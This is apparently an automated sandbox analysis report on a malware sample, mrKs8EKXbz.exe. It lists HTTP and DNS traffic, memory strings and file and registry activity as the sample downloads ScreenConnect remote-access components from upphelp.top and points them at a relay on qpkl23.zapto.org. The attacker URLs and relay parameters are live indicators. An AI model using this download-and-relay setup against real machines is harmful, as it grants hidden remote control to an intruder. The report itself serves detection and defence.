Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: upphelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: upphelp.topAccept-Encoding: gzip

Source: global traffic	DNS traffic detected: DNS query: upphelp.top
Source: global traffic	DNS traffic detected: DNS query: qpkl23.zapto.org

Source: mrKs8EKXbz.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: mrKs8EKXbz.exe, 00000001.00000002.2182851110.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrt
Source: mrKs8EKXbz.exe, 00000001.00000002.2182851110.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrust
Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
Source: mrKs8EKXbz.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: mrKs8EKXbz.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: F2E248BEDDBB2D85122423C41028BFD40.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: mrKs8EKXbz.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 00000007.00000002.3395312503.000001EE1B600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: mrKs8EKXbz.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: mrKs8EKXbz.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: mrKs8EKXbz.exe, 00000001.00000002.2182851110.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256Time
Source: mrKs8EKXbz.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: mrKs8EKXbz.exe, 00000001.00000002.2182851110.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.b
Source: mrKs8EKXbz.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dfsvc.exe, 00000002.00000002.3011871515.0000015F99831000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: dfsvc.exe, 00000002.00000002.3011871515.0000015F99831000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.2.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.2.dr	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
Source: mrKs8EKXbz.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: mrKs8EKXbz.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: mrKs8EKXbz.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: mrKs8EKXbz.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: dfsvc.exe, 00000002.00000002.3005354461.0000015F980D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
Source: dfsvc.exe, 00000002.00000002.3015424893.0000015FFDBBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F8001A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.3395048636.0000000002252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8079B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80545000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80797000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F806BC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8066F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://upphelp.top
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: mrKs8EKXbz.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F8043C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8042A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.o
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F8045F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8043C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80352000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F804C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80090000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80090000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
Source: ScreenConnect.Core.dll.2.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: edb.log.7.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000007.00000003.2152396817.000001EE1B4E0000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8079B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80545000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F806BC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80253000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8066F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80629000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Clie
Source: dfsvc.exe, 00000002.00000002.3011555377.0000015F997CF000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3011349538.0000015F99780000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3014031358.0000015F9B4DC000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3005354461.0000015F98020000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3011871515.0000015F99831000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3011736711.0000015F99804000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80352000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3011816151.0000015F99815000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2398689538.000000000120F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2399007131.000000000126F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2399294673.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2399294673.0000000002F1F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2400989518.000000001BA06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.application
Source: dfsvc.exe, 00000002.00000002.3014224516.0000015F9B4E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.appP
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2398651686.0000000001189000.00000004.00000020.00020000.00000000.sdmp, DU2B58II.log.2.dr	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2400989518.000000001BA06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.application%
Source: dfsvc.exe, 00000002.00000002.3014031358.0000015F9B4DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.application8
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2399007131.000000000126F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.application;
Source: dfsvc.exe, 00000002.00000002.3014031358.0000015F9B4DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.application=
Source: mrKs8EKXbz.exe, 00000001.00000002.2182851110.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.application?e=
Source: DU2B58II.log.2.dr	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2398689538.000000000120F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.applicationA
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2400989518.000000001BA06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.applicationH
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2399294673.0000000002F1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.applicationX
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2399007131.000000000126F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.applicationc
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2400651900.000000001B9A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.applicatione
Source: dfsvc.exe, 00000002.00000002.3013240038.0000015F99963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.applicationf
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2400651900.000000001B9A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.applicationsers%&/
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F8066F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.dll
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2399294673.0000000002F1F000.00000004.00000800.00020000.00000000.sdmp, DU2B58II.log.2.dr	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.manifest
Source: dfsvc.exe, 00000002.00000002.3011349538.0000015F99780000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Client.manifestF
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80545000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8066F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.ClientSe
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F8066F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.ClientService.dll
Source: dfsvc.exe, 00000002.00000002.3013240038.0000015F99963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.ClientService.dllV
Source: dfsvc.exe, 00000002.00000002.3013240038.0000015F99963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.ClientService.dll~
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80545000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3011871515.0000015F99831000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.ClientService.exe
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F8079B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80545000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F801F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3012064740.0000015F998BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Core.dll
Source: dfsvc.exe, 00000002.00000002.3012064740.0000015F998BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Core.dllY
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F806BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Wind
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F806BC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3012064740.0000015F998BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Windows.dll
Source: dfsvc.exe, 00000002.00000002.3012064740.0000015F998BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.Windows.dll7
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F805C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsBackstage
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80629000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsBackstageShell.ex
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80545000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80545000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3014378261.0000015F9B4EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config
Source: dfsvc.exe, 00000002.00000002.3005354461.0000015F98115000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeEt
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F806BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsC
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F805C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsClient.ex
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F806BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsClient.exe
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80545000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsClient.exe.config
Source: dfsvc.exe, 00000002.00000002.3005354461.0000015F98115000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsClient.exe.configfw
Source: dfsvc.exe, 00000002.00000002.3013240038.0000015F99963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsClient.exe6
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80629000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsFileManag
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F805C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.e
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80545000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.exe
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80545000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config
Source: dfsvc.exe, 00000002.00000002.3005354461.0000015F98115000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.exeNt
Source: dfsvc.exe, 00000002.00000002.3005354461.0000015F98115000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.exeow
Source: dfsvc.exe, 00000002.00000002.2999833132.0000015F8079B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://upphelp.top/Bin/ScreenConnect.x

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 79.110.49.196:443 -> 192.168.2.6:49715 version: TLS 1.2

E-Banking Fraud

Drops certificate files (DER)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4	Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
